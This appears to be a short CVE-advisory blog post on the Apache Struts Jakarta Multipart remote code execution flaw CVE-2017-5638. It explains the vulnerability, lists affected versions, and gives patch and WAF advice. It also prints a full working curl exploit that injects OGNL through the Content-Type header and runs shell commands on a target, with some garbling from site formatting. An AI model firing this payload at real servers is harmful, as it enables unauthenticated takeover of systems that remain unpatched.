Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts is a critical remote code execution flaw stemming from flawed error handling in the Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header to a server using the vulnerable Struts library. When the framework attempts to process an invalid or malformed file upload request, it incorrectly passes the unvalidated `Content-Type` value to the underlying Java Expression Language (OGNL) interpreter during the error message generation process. This allows an attacker to inject and execute arbitrary OGNL expressions. Since OGNL expressions can call Java methods and execute system commands with the same privileges as the Struts application server, this vulnerability provides a direct path for unauthenticated attackers to achieve full remote command execution on the target system. The attack is particularly dangerous because it does not require a valid file upload or any form of user authentication, making it easy to weaponize.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patched 2017-03-07

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-showcase/fileupload/doUpload.action`

How Exploit:

Malicious Content-Type header injection.

OGNL expression execution.

Arbitrary system command execution.

Protection from this CVE

Apply vendor patch immediately.

Upgrade to Struts 2.3.32 or 2.5.10.1.

WAF filtering for malicious headers.

Impact:

Full system compromise.

Data breach and theft.

Complete application control.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top